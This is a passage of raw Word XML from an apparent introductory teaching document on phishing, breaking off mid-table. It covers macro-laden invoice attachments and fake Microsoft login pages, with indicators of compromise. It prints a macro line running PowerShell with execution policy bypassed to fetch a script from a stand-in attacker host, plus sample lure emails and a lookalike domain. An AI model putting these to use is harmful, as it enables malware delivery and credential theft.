        <w:t xml:space="preserve">Phishing is when an attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pretends to be someone trustworthy</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> — like a company or co-worker — and sends a fake email or message to trick a victim.</w:t>
      </w:r>
      <w:r w:rsidR="00041292" w:rsidRPr="00041292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00041292" w:rsidRPr="00E817BE">
        <w:t>Phishing tricks employees or users into giving away passwords or running dangerous software, usually via email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B8D8C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Their goal is usually to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2912144B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Make the victim </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>click a link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A15252" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Download a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DFDBCD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enter their password</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> into a fake website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFE9F1" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Once the victim falls for it, the attacker can install malware, steal credentials, or begin deeper attacks inside the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71DA5A" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Spear-Phishing with Malicious Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD28337" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Attacker writes a convincing email</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>—“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Invoice Due! Please see attached.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000AA9F" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>The email contains a Microsoft Word document with a hidden macro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E8734" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>When the victim opens it and enables macros, the macro downloads and runs malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B5AFE2" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Malware gives the attacker an initial foothold into the company.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7757D8" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00D60AEC" w:rsidRDefault="00041292" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="4AF3177C" w14:textId="65C124DE" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Procedure 2.1: Malicious Word Document with Macro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C88FB53" w14:textId="1367F14F" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidR="00041292">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Make the user run a malicious macro that downloads malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E6835" w14:textId="46B9D17B" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9096E9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Attacker creates a Word file named invoice.docm with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>macro</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> that runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9B548" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Shell "powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> Bypass -File \\attacker.com\malware.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDC5F00" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>The attacker sends an email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB65C5D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Subject: URGENT – Payment Invoice  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05020E5E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Body: Please review the attached invoice. Contact us for questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEDD090" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Victim opens the file and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clicks “Enable Content”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> (this runs the macro).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506708CA" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">The macro silently runs PowerShell and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>downloads the malware</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7CA0F9" w14:textId="3B102B41" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidR="00501A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Malware is executed. The attacker gains access to the victim’s system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01382729" w14:textId="76583660" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="6242F3EF" w14:textId="57908823" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedure 2.2: Fake Login Page to Steal Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18272B74" w14:textId="74FBEF4C" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidR="00041292">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Trick user into entering real credentials on a fake website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BAC6E6" w14:textId="2C7EB0CA" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656D4383" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Attacker creates a clone of a real website (e.g., https://login-microsoft.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC3F040" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Sends a phishing email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4F873" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Subject: Microsoft Account Locked  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AC315D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Body: Your account was accessed from an unknown location.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE919B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Click below to verify and unlock access.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254B276" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Link: http://login-microsoft.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F39D3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Victim clicks the link and is taken to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fake login page</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A2F25" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">They enter their </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>email and password</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>, which is instantly sent to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F4999" w14:textId="2682BDBC" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD17D5F" w14:textId="48C3966E" w:rsidR="00041292" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Attacker now has valid login credentials — they can access email, cloud apps, or internal systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0665C" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Indicators of Compromise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F385E1" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Emails urging urgent action, with weird sender addresses or attachments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6463D3E4" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Employees reporting odd logins or password resets they didn’t request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758F58A" w14:textId="49869B37" w:rsidR="00041292" w:rsidRPr="00D60AEC" w:rsidRDefault="00041292" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Spread of strange files or sudden spike in malware alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188E33A" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:r w:rsidRPr="00E817BE">
        <w:lastRenderedPageBreak/>
        <w:t>Motivation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B820A9B" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Most phishing is financial—ransomware, payment theft, or corporate espionage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E6868F" w14:textId="445E88B4" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Attackers Use Phishing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35"/>
        <w:gridCol w:w="5505"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="35A97E6C" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31C4C47D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64B2AD26" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="57A7E093" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4263B320" w14:textId="63714FE1" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Easy Entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05DBADD1" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="001D5AD4">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>No technical skills needed if the victim falls for it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="34BF217E" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E5F4356" w14:textId="1302BABD" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Human Weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A73594" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Many people still click suspicious links or enable macros</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="30C834C9" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2374B77E" w14:textId="4FE83F3D" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Bypasses Defen</w:t>
            </w:r>
            <w:r w:rsidR="001D5AD4">
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>es</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB012A5" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>The attacker uses the victim’s action to run the attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="01B63EC3" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9DCBA1" w14:textId="16860D27" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Highly Effective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F999357" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Works on both technical and non-technical users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5510A371" w14:textId="012838E4" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact of Phishing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96"/>
        <w:gridCol w:w="6075"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="7D66CFB8" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A5AF732" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Type of Damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ECA2E81" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="00C65A29" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C3BC345" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Credential Theft</w:t>
